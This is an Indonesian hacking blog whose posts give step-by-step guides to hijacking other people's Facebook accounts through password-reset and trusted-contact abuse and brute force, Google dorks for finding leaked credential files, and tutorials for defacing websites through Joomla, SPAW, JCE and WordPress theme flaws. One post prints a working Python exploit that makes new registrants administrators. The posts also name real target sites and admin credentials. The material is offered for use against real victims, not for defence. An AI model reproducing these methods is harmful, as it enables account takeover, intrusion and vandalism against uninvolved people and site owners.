Pages

Jumat, 22 November 2013

CARA HACK FACEBOOK TANPA SOFTWARE

Pertama , yang perlu di persiapkan adalah sebuah e-mail yang kamu target tetapi bukan dari yahoo mail dan gmail. (Ingat ! bukan dari yahoo mail maupun Gmail) 
  • sebagai contoh : blablabla.programmer.net
  • atau misalkan email dari situs www.mail.com , rocketmail dll , ini tidak support dari facebook.
  • sesudah itu , siapkan sebuah email kamu yang baru , atau bisa email kamu yang belum terdaftar di facebook.
  • setelah itu , buka situs facebook.com . ( tentunya dong -_- )
  • setelah itu , klik lupa kata sandi anda ? di bawah kolom kata sandi.
  • setelah itu , masukan email target , sebelum memasukan email target , lihat lah langkah pertama dahulu , apakah email anda sudah memenuhi syarat apa belum. lihat gambar di bawah ini.

  • sesudah itu , klik tombol cari . dan hasilnya seperti di bawah ini.

  • klik yang saya beri anak panah bewarna kuning.
  • setelah itu , lihat screen shot di bawah ini dan ikuti caranya. ^^!


  • masukkan email yang baru anda buat tadi dan buka email anda.
  • masukkan kode konfirmasinya . ^^



Diposting oleh Unknown di 18.18 0 komentar

Cara Deface Dengan Teknik Exploit Joomla | Com_User


Assalamualaikum....

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p

Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html    Password: Lihat

2. Titip Nama : SPERONAH 
UPDATE:

Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...

Contoh :
http://troytradingint.com.pe/administrator/

bira lebih memudahkan sobat dalam mencari web target, silahkan gunakan Tool Scanner Com User 

Demo:
http://troytradingint.com.pe/
http://www.uog.edu.pk/
http://www.trexperts.com/jeffreytmiller/

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Kembangin Sendiri :p

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration

5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:

6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, 

7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!

9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!

10. Lalu masuk kehalaman admin login nya! 

http://mobile.resto-lincontournable.com/administrator

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix
Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index

Goodluck!!! :p

udah gitu aja! Salam........ :p


Diposting oleh Unknown di 02.30 0 komentar

Hack Facebook Menggunakan Trik 3 Teman Terpercaya

Assalamualaikum...


Sobat, saatnya bilang wow? Tunggu dulu sebelum sobat mencoba trik ini.. :p

langsung ke topik,, hehehe :D

Trik ini mudah saja, semua orang bisa melakukannya :p

yang diperlukan adalah sobat harus memiliki beberapa akun facebook minimal tiga, tapi baiknya lebih dari 3 ;) buat saja akun facebook yang bnyak.. hehehehe dan usia akun facebook itu harus lebih dari 7 hari, kalo masih baru trik ini ga kan bekerja.. :p klo sudah punya beberapa akun, langsung saja berteman dengan target ;)jangan lupa, siapkan juga email yg baru.. ;)

ini langkah2nya :

1. buka facebook.com. lalu klik forgot password / Lupa Password

2. lalu masukkan email atau username target.. klik search!

3. kalo udah ketemu akun target? klik aja "Ini Akun saya"

4. lalu pilih "Tidak lagi memiliki Akses ke sini"

5. masukkan email yg telah disiapkan sobat tadi..

6.  kemudian ada perintah untuk menjawab pertanyaan. jawab aja salah jg gpp ;)

7. saatnya memilih 3 akun palsu yg kita buat sebelumnya.. klik "Selanjutnya" lalu pilih 3 teman, disini pilihlah 3 teman yaitu beberapa facebook palsu yg sobat persiapkan sebelumnya ;)

8. lalu facebook akan mengirimkan kode keamanan ke 3 akun tadi,, kumpulkan kodenya lalu masukkan.. baiknya gunakan browser lain utk membuka 3 akun palsu sobat.. ;)

9. setelah itu facebook akan mengirimkan "Password Recovery Email" atau Pemulihan akun ke email sobat tadi.. tinggal buka email, dan reset pasasword facebooknya.

10. tarrraaa.. facebook udah bisa sobat kuasai.. :p

Note: Sobat akan menemukan sedikit perbedaan  dalam trik ini pada saat mencobanya, jadi gunakan pikiranmu untuk mengembangkannya lagi.. :p

Sekian Terimakasih ;) 
Diposting oleh Unknown di 02.21 0 komentar

Tool Hack Akun Facebook 2013


Assalamualaikum...
Nih ane punya aplikasi hack facebook (kata org2 :3) yg bisa sobat gunakan untuk menemukan password dari akun facebook orang lain :D caranya penggunaaanya sangat mudah dan simple aja kok,, yuk disimak :D untuk pengguna windows, disarankan untuk melengkapin bahan2 yg telah dilampirkan agar aplikasi tersebut bisa berjalan dengan baik :) dan sebelumnya tools ini sudah ane coba, dan masih work 100% :D

UPDATE : Not Working on Windows XP :p dan Bacanya ampe abis!!!!!!!!

Bahan - Bahan

1. Python 2.7 | Download

2. Aplikasi Hack Facebook | Download Password: Lihat

3. Wordlist | Use your brain :p (pikirkan kira2 passwordnya apaan)

4.Mechanize | Baca bagian bawah! :p

Langkah - Langkah

Download dulu bahan2 lalu install Python 2.7 nya, kemudian extract file tool hack FB nya, kalo ane di extract di partisi D:\


Kemudian buka terminal sobat dan masuk ke directori D:\facebook




Setelah itu jalankan toolnya dengan cara ketik facebook.py lalu enter! masukkan email/username akun facebook target lalu enter! trus masukin juga nama file password list yg isinya merupakan kumpulan dari kombinasi kata, huruf dan angka, lalu enter!

Sekarang tinggal nunggu hasilnya, lama prosesnya tergantung dari banyaknya wordlist yg digunakan! kalo punya ane cuma 1GB, jadi sekitar beberapa menit menit aja :D



Setelah menunggu beberapa saat, ketemu dah passwordnya :D
Nah tinggal Login aja ke Facebooknya :D

Udah yaa, Selamat mencoba aja.. Goodluck!! :D


kalo seandainya sobat meengalami error saat menjalankan toolsnya, silahkan install Mechanize! Downloaddisini! cara installnya via terminal masuk dulu ke directori mechanize, lalu ketik perintah : setup.py install lalu enter! liat gambar!
Diposting oleh Unknown di 02.18 0 komentar

Sabtu, 16 November 2013

Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui

Sobat mau belajar tentang hacking? Nah kalo sobat mau belajar tentang ilmu yang satu ini, Sobat perlu mengenal dan mengetahui Istilah-Istilah dalam Dunia Hacking agar sobat tidak bingung ketika mempelajari dunia hacking itu sendiri.
Berikut Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui :

1). Bug
-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

2). Patch
-> Perbaikan terhadap bug dengan mengupdate sistem yang memiliki vurnerable system.

3). Vurnerable
-> Sistem yang memiliki bug sehingga rentan terhadap serangan.

4). RFI
-> Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load.

5). LFI
-> Suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable ( Vulnerable LFI maksudnya ).

6). SQL Injection
-> Salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.

7). DDoS
-> Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.

8). Shell
-> Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya.

9). Deface
-> Merubah tampilan halman suatu website secara paksa dan illegal.

10). Debug
-> Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.

11). XSS
-> Adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.

12). Phising
-> Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

13). Keylogger
-> Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

14). Fake Login
-> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

15). Fake Process
-> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

16). Malicious Code/Script
-> Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.

17). Virus
-> Kode jahat yang sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yang terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.

18). Worm
-> Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

19). Trojan
-> Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

20). Backdoor
-> Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.

Sebetulnya istilah-istilah dalam dunia hacking itu banyak, tapi hanya 20 point saja yang saya tulis disini, dan untuk istilah hacking lainnya, sobat bisa cari digoogle. Sekian postingan saya kali ini tentang  Istilah istilah di dunia hacking wassalam :)

 


Diposting oleh Unknown di 16.31 0 komentar

Jumat, 25 Oktober 2013

CARA MERUBAH BACKGROUND FACEBOOK




Kali ini saya postingkan cara mengganti layout/latar facebook, Capek kali ya dengan background facebooknya yang itu-itu aja “putih biru”. huhu.. si Wong Pro udah penasaran nih :v
Yowes liat dlu ne contoh theme/background di bawah ini..... Mau sperti itu kan, pasti Dong..!! hehe… Langsung saja aplikasikan langkah langkah di bawah ini.

1. Pastikan anda sedang login di facebook
2. Download add on mozila atau klik link tersebut
    https://addons.mozilla.org/en-US/firefox/addon/stylish/
    Klik “Add to Firefox” setelah itu restart Firefox
3. Setelah Add on terinstal silahkan pilih tampilan facebook sobat klik link di bawah ini..!!
    http://userstyles.org/styles/browse/facebook

4. Klik install stylish pada samping kanan gmabar lalu Save
5. Silahkan lihat hasilnya Di facebook sobat

 Nah itu dia Sob 5 langkan merubah background facebook, Mudahkan..??
Diposting oleh Unknown di 21.08 0 komentar

Sabtu, 12 Oktober 2013

Deface Website Dengan Teknik Spaw Upload Vulnerability 

 

 Hello Sobat  Saya Akan Mengajari Tutorial Deface Dengan cara teknik tersebut ..
 maaf no SS :) Tanpa Basa Basi ..

Langkah :
1.Buka Om Google Masukin 
Dork :
inurl:”spaw2/uploads/files/” site:th
site:th bisa di ganti dengan negara yg agan mau deface :)
2.Ane Masukin Contoh Target ~> www.target.th/w3c/senate/spaw2/uploads/files/
3. Ganti  spaw2/uploads/files dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4. upload file agan" ..
5. Nanti Kalo Sukses Di sebelah kanan ada bacaan download file , terus kalian harus click itu supaya tau link hasil defacean kalian ..

  Sekian Dari Saya ..


Diposting oleh Unknown di 21.37 0 komentar

Hack Facebook Menggunakan search Google 

Oke Kli Ini Saya Share Hack Fb Dengan Google Search Oke Gw Males Ngetik Langsung Saja Ya


 1).Buka www.google.com 


2).Masukan Salah Satu Dork Di Bawah Ini

Dork:
1. intext:@ymail.com | @gmail.com | @hotmail.com | @yahoo.co.id ext:txt "facebook"

2. intext:"email=" & intext:"pass=" & intext:"charset_test=" intext:@ymail.com | @gmail.com | @hotmail.com | @yahoo.co.id ext:txt "paypal passwd" 2013

3. ext:txt "username" "password" @ymail.com OR @yahoo.com OR @msn.com OR @gmail.com 2013 

4. filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test=" 

5).Habis Search Google Buka Dehh 

Gk Usah Repot-Repot Buat Phising Segala Hahaha

 sumber:gca

Diposting oleh Unknown di 21.32 0 komentar

Cara Deface Web Dengan Exploit JCE Joomla Extension 

   Setelah lama saya tidak posting deface, kali ini saya akan share trik deface yang akhir - akhir ini menjadi trik yang sering digunakan para defacer, simak seperti apa trik ini.
 


Ada 2 cara yang dapat kita gunakan, yaitu dengan JCE Exploiter yang versi .exe & yang versi .php

JCE Exploiter Versi .exe

1. Download JCE Exploiternya disini


2. Selesai download, anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce
 
 
3. Silahkan anda test satu persatu web dari hasil dork apakah web tersebut vuln atau tidak dengan mencopy url webnya, yaitu : www.site.com

4. Buka JCE Exploiter yang tadi diunduh, lalu klik 2x pada JCE.exe


5. Jika vuln, maka akan keluar url/link shell anda di kolom bawah seperti ini

6. Anda copy link tersebut ke addressbar, maka akan muncul uploader untuk upload shell anda

7. Untuk membuka shellnya, tinggal rename url di bagian paling belakang, yaitu 3xp.php menjadi namashellanda.php

8. Maka muncul deh shell anda, eksekusi deh tuh web.

 
NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja


JCE Exploiter Versi .php

1. Download scriptnya disini


2. Selesai download, jangan dilupa diekstrak terlebih dahulu

 
3. Lalu anda upload file php tersebut pada web hosting anda/web hasil deface sebelumnya, atau anda bisa gunakan punya saya disini

 
4. Kemudian anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce

5. Nah anda isi deh kolom kolom kosong di JCE.php tadi
- Anda masukkan url target ke kolom "hostname", misal : www.site.com (tidak menggunakan http://)
- Anda masukkan path target ke kolom "path", misal : webnya www.site.com/v2/, maka pathnya /v2/ tapi jika tidak ada pathnya isi saja /
- "Please specify a file to upload" adalah untuk memilih shell anda yang akan diupload
- Kolom selanjutnya kosongi saja
 
6. Selanjutnya klik "start" dan proses exploitasi akan berjalan, jika berhasil maka dibawah akan muncul tulisan seperti ini


7. Nah anda copy link tersebut ke addressbar, maka shell kesayangan anda akan muncul. Silahkan deh dieksekusi.


NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja




Diposting oleh Unknown di 21.26 0 komentar

Cara Deface Dengan Archin WordPress 

YeyeyeLalaalaala Wkwkwk Hey Ketemu Saya Lagi Broo Nihh Ane Mau Nunjukin Deface Dengan Teknik Archin Oke Langsung Saja Om Ke TKP

BAHAN:
-Kopi
-Camilan 
-python (Gk Punya Python Download Di Google Om )
saya Anggap ente Sudh Punya Python Langsung Saja Install python
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib


#target site
site = "Targetnya Broo"
#path to ajax.php
url = "/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
   
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"

save filenya dengan berekstensi .py Inget .py Jgn Yg Laen Wkwkwk
lalu cari target website dengan mengunakan dork berikut :


DORK:
/wp-content/themes/*/hades_framework/ 
 /wp-content/themes/felici/hades_framework/ 
 /wp-content/themes/averin/hades_framework/ 
 /wp-content/themes/shotzz/hades_framework/
 /wp-content/themes/KLR/hades_framework/
 /wp-content/themes/yvora/hades_framework/
 /wp-content/themes/ratius/hades_framework/
 /wp-content/themes/dagda/hades_framework/ 
 /wp-content/themes/shopsum/hades_framework/
 /wp-content/themes/ultrici/hades_framework/
 /wp-content/themes/bizniz/hades_framework/
 /wp-content/themes/appius/hades_framework/ 
 /wp-content/themes/majestics/hades_framework/
 /wp-content/themes/candy/hades_framework/
 /wp-content/themes/vithy/hades_framework/ 
 /wp-content/themes/sodales/hades_framework/

Lalu Coba Buka Misalnya Saya Tadi Pakek Dork /wp-content/themes/yvora/hades_framework/
Berarti Ntar Cek Sitenya Vuln Atau Tdk Dengan Cara http://site/wp-content/themes/yvora/hades_framework/option_panel/ajax.php/

Jika Target Tersebut Blnk/Kosong Berarti Web Berikut Vuln
Setelah Itu Buka Start ~> run ~> cmd
ketik "D:" (karena script yg diatas saya letakkan di local disk D)
ketik lagi "filenya.py" dan pencet enter. sehingga menjadi seperti ini :


Jika Sudah Seperti Itu Tandanya Berhasil Tinggal Register Dehh
http:/site.com/wp-login.php

Jika Sudah Registrasi Password Akan Terkirim Ke Email Tadi Cek Email Kamu Broo


Kalo Sudah Terserah Dehh Lo Apain Webnya Tapi Jgn Tebas Index.phpnya Index.phpnya Rename Aja Ganti Dengn Index.html Hargai Karya Orang

NB : Kami Tdk Bertanggung Jawab Atas Segala Hal Yg Anda Lakukan

sumber :GCA

 

Diposting oleh Unknown di 21.14 0 komentar